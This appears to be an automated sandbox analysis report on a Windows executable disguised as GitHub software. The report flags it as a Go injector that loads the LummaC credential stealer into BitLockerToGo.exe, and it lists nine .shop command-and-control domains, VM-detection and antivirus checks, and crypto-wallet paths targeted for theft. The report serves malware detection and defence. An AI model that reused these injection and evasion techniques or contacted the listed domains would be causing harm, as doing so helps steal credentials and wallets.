Source: github_softwares_v1.18.exe	String found in binary or memory: google.protobuf.FieldOptions_JSTypegoogle.protobuf.FileDescriptorProtogoogle.protobuf.EnumDescriptorProtogoogle.protobuf.UninterpretedOption&descriptor.ServiceDescriptorProto{delimiters may only be "{}" or "<>"string field contains invalid UTF-8%v already implements proto.Messagecrypto/cipher: input not full blocksmethod ABI and value ABI don't alignreflect.Value.Equal: values of type Time.UnmarshalBinary: invalid lengthstrings.Builder.Grow: negative countstrings: Join output length overflowThunk Address Of Data too spread outPower PC with floating point supportCherokee United States (chr-Cher-US)Chinese (Traditional) Taiwan (zh-TW)English United Arab Emirates (en-AE)accessing a corrupted shared library444089209850062616169452667236328125ryuFtoaFixed64 called with prec > 180123456789abcdefghijklmnopqrstuvwxyzbytes: Repeat output length overflowbytes.Reader.ReadAt: negative offsetbytes.Reader.Seek: negative positionsyntax error scanning complex numberlfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnable
Source: github_softwares_v1.18.exe	String found in binary or memory: google.protobuf.FieldOptions_JSTypegoogle.protobuf.FileDescriptorProtogoogle.protobuf.EnumDescriptorProtogoogle.protobuf.UninterpretedOption&descriptor.ServiceDescriptorProto{delimiters may only be "{}" or "<>"string field contains invalid UTF-8%v already implements proto.Messagecrypto/cipher: input not full blocksmethod ABI and value ABI don't alignreflect.Value.Equal: values of type Time.UnmarshalBinary: invalid lengthstrings.Builder.Grow: negative countstrings: Join output length overflowThunk Address Of Data too spread outPower PC with floating point supportCherokee United States (chr-Cher-US)Chinese (Traditional) Taiwan (zh-TW)English United Arab Emirates (en-AE)accessing a corrupted shared library444089209850062616169452667236328125ryuFtoaFixed64 called with prec > 180123456789abcdefghijklmnopqrstuvwxyzbytes: Repeat output length overflowbytes.Reader.ReadAt: negative offsetbytes.Reader.Seek: negative positionsyntax error scanning complex numberlfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnable
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.init
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.init.func1
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.Bytes
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.init.func2
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.init.0
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.Protocol
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.Payload
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.String
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.Empty
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.Unmarshal
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.Marshal
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).UnmarshalJSON
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.MarshalJSON
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).Scan
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.NewIDAddress
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.NewActorAddress
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.addressHash
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.NewFromBytes
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.newAddress
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.encode
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.Checksum
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.base32decode
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.decode
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.ValidateChecksum
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.hash
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.MarshalBinary
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).UnmarshalBinary
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).MarshalCBOR
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).UnmarshalCBOR
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.init.1
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).Bytes
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).Empty
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).Marshal
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).MarshalBinary
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).MarshalJSON
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).Payload
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).Protocol
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).String
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).Unmarshal
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address.NewFromString
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/hashicorp/hc-install/internal/build.init
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/hashicorp/hc-install/product.init
Source: github_softwares_v1.18.exe	String found in binary or memory: 1type:.eq.[3]github.com/valkey-io/valkey-go/internal/cmds.Completedtype:.eq.[4]github.com/valkey-io/valkey-go/internal/cmds.Completedtype:.eq.[5]github.com/valkey-io/valkey-go/internal/cmds.Completedgithub.com/airforce270/airbot/permission.initgolang.org/x/exp/rand.initgolang.org/x/exp/rand.NewSourcegolang.org/x/exp/rand.(PCGSource).Seedgolang.org/x/exp/rand.Newgolang.org/x/exp/rand.readgolang.org/x/exp/rand.(PCGSource).Uint64golang.org/x/exp/rand.(PCGSource).multiplygolang.org/x/exp/rand.(PCGSource).addgolang.org/x/exp/rand.(LockedSource).Uint64golang.org/x/exp/rand.(LockedSource).Seedgolang.org/x/exp/rand.(LockedSource).Readgolang.org/x/exp/rand.(PCGSource).MarshalBinarygolang.org/x/exp/rand.(PCGSource).UnmarshalBinarytype:.eq.golang.org/x/exp/rand.Randgithub.com/onsi/gomega/format.initgithub.com/petergtz/pegomock/v4.initgithub.com/hashicorp/go-version.init.0github.com/hashicorp/go-version.prereleaseCheckgithub.com/hashicorp/go-version.(Version).Prereleasegithub.com/hashicorp/go-version.(Version).equalSegmentsgithub.com/hashicorp/go-version.(Version).Segments64github.com/hashicorp/go-version.constraintEqualgithub.com/hashicorp/go-version.(Version).Equalgithub.com/hashicorp/go-version.constraintNotEqualgithub.com/hashicorp/go-version.constraintGreaterThangithub.com/hashicorp/go-version.constraintLessThangithub.com/hashicorp/go-version.constraintGreaterThanEqualgithub.com/hashicorp/go-version.constraintLessThanEqualgithub.com/hashicorp/go-version.constraintPessimisticgithub.com/hashicorp/go-version.(Version).LessThangithub.com/hashicorp/go-version.init.1github.com/hashicorp/go-version.newVersiongithub.com/hashicorp/go-version.(Version).Comparegithub.com/hashicorp/go-version.allZerogithub.com/hashicorp/go-version.comparePartgithub.com/hashicorp/go-version.comparePrereleasesgithub.com/hashicorp/go-version.(Version).Stringgolang.org/x/mod/internal/lazyregexp.initgolang.org/x/mod/internal/lazyregexp.Newgolang.org/x/mod/internal/lazyregexp.(Regexp).regolang.org/x/mod/internal/lazyregexp.(Regexp).build-fmgolang.org/x/mod/internal/lazyregexp.(Regexp).buildtype:.eq.golang.org/x/mod/internal/lazyregexp.Regexpgolang.org/x/mod/module.initgolang.org/x/mod/modfile.initgithub.com/hashicorp/hc-install/internal/build.initgithub.com/hashicorp/go-version.NewVersiongithub.com/hashicorp/go-version.Mustgithub.com/hashicorp/hc-install/product.initdebug/dwarf.initmain.initmain.DTmrIgCrphmain.Md5Encodemain.ytKayiJWPamain.VAWaNIGxhkmain.Memcpymain.Memsetmain.EUmYbmcUAGmain.ocwRCsCPHRio/ioutil.ReadFilemain.randSeqmain.pPUVgZVyOEmain.init.0main.mainmain.TerminateProcessmain.IsBadReadPtrmain.VirtualAllocmain.VirtualAllocExmain.cakJEcUUFAmain.ydalavksVTmain.CrgIsaShqomain.Is64Bitmain.emxWBxUpUdmain.JTHjHPuFMmmain.(ApplyRelocCallback).processRelocFieldmain.FaFbjTwpAYmain.LEwTRJnGzVmain.(BASE_RELOCATION_ENTRY).GetOffsetmain.(BASE_RELOCATION_ENTRY).GetTypemain.ijGZAeCxnhmain.aRhdRNnUlAmain.BVhioCgrSVmain.bSVtHWyZxSmain.IeOSmicYkbmain.xSJjUNcndjmain.Virtual
Source: github_softwares_v1.18.exe	String found in binary or memory: net/addrselect.go
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address@v1.1.0/address.go
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address@v1.1.0/address.go
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/filecoin-project/go-address@v1.1.0/constants.go
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/magiconair/properties@v1.8.7/load.go
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/hashicorp/hc-install@v0.7.1-0.20240607080111-03e0bd63529f/internal/build/go_build.go
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/hashicorp/hc-install@v0.7.1-0.20240607080111-03e0bd63529f/internal/build/install_go_version.go
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/hashicorp/hc-install@v0.7.1-0.20240607080111-03e0bd63529f/internal/build/install_go_version.go
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/hashicorp/hc-install@v0.7.1-0.20240607080111-03e0bd63529f/product/terraform.go
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/hashicorp/hc-install@v0.7.1-0.20240607080111-03e0bd63529f/product/consul.go
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/hashicorp/hc-install@v0.7.1-0.20240607080111-03e0bd63529f/product/nomad.go
Source: github_softwares_v1.18.exe	String found in binary or memory: github.com/hashicorp/hc-install@v0.7.1-0.20240607080111-03e0bd63529f/product/vault.go

Source: C:\Users\user\Desktop\github_softwares_v1.18.exe

File read: C:\Users\user\Desktop\github_softwares_v1.18.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\github_softwares_v1.18.exe "C:\Users\user\Desktop\github_softwares_v1.18.exe"
Source: C:\Users\user\Desktop\github_softwares_v1.18.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Users\user\Desktop\github_softwares_v1.18.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Jump to behavior

Source: C:\Users\user\Desktop\github_softwares_v1.18.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\github_softwares_v1.18.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\github_softwares_v1.18.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\github_softwares_v1.18.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\github_softwares_v1.18.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\github_softwares_v1.18.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\github_softwares_v1.18.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\github_softwares_v1.18.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\github_softwares_v1.18.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\github_softwares_v1.18.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\github_softwares_v1.18.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: github_softwares_v1.18.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: github_softwares_v1.18.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: github_softwares_v1.18.exe

Static file information: File size 30190080 > 1048576

Source: github_softwares_v1.18.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0xdee600
Source: github_softwares_v1.18.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0xd33e00

Source: github_softwares_v1.18.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: BitLockerToGo.pdb source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C000580000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000002.1708247125.000000C000400000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000003.1701551736.0000014A798F0000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000003.1701601425.0000014A798B0000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C0006A1000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C000580000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000002.1708247125.000000C000400000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000003.1701551736.0000014A798F0000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000003.1701601425.0000014A798B0000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C0006A1000.00000004.00001000.00020000.00000000.sdmp

Source: github_softwares_v1.18.exe

Static PE information: section name: .xdata

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A43710 push ecx; ret		1_2_02A43711
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A43718 push ecx; ret		1_2_02A43719

Source: C:\Users\user\Desktop\github_softwares_v1.18.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7148	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7132	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: BitLockerToGo.exe, 00000001.00000003.1794021894.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.1846072628.0000000002E5B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1777410523.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1777480522.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.1846072628.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1844557480.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1730573797.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1730674997.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: github_softwares_v1.18.exe, 00000000.00000002.1708816779.0000014A54234000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 1_2_02A39870 LdrInitializeThunk,

1_2_02A39870

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\github_softwares_v1.18.exe

Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2A00000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\github_softwares_v1.18.exe

Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2A00000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: bravedreacisopm.shop
Source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: shellfyyousdjz.shop
Source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: broccoltisop.shop
Source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: grassytaisol.shop
Source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: stimultaionsppzv.shop
Source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: parntorpkxzlp.shop
Source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: effectivedoxzj.shop
Source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: horizonvxjis.shop
Source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: weaknessmznxo.shop

Writes to foreign memory regions

Source: C:\Users\user\Desktop\github_softwares_v1.18.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2A00000			Jump to behavior
Source: C:\Users\user\Desktop\github_softwares_v1.18.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 29F6008			Jump to behavior

Source: C:\Users\user\Desktop\github_softwares_v1.18.exe

Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Jump to behavior

Source: C:\Users\user\Desktop\github_softwares_v1.18.exe	Queries volume information: C:\Users\user\Desktop\github_softwares_v1.18.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\github_softwares_v1.18.exe	Queries volume information: C:\Windows VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\github_softwares_v1.18.exe	Queries volume information: C:\Windows\AppReadiness VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\github_softwares_v1.18.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\github_softwares_v1.18.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\github_softwares_v1.18.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\github_softwares_v1.18.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Go Injector

Source: Yara match	File source: github_softwares_v1.18.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000000.1663970758.00007FF764F18000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1711084287.00007FF764F18000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: github_softwares_v1.18.exe PID: 6632, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 7056, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: BitLockerToGo.exe, 00000001.00000003.1777410523.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: BitLockerToGo.exe, 00000001.00000003.1777410523.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: BitLockerToGo.exe, 00000001.00000003.1754529360.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Libertynyb9B\|
Source: BitLockerToGo.exe, 00000001.00000003.1777410523.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: BitLockerToGo.exe, 00000001.00000003.1777410523.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: BitLockerToGo.exe, 00000001.00000003.1777769387.0000000002E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
Source: BitLockerToGo.exe, 00000001.00000003.1794021894.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: BitLockerToGo.exe, 00000001.00000003.1777410523.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: BitLockerToGo.exe, 00000001.00000003.1777769387.0000000002E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

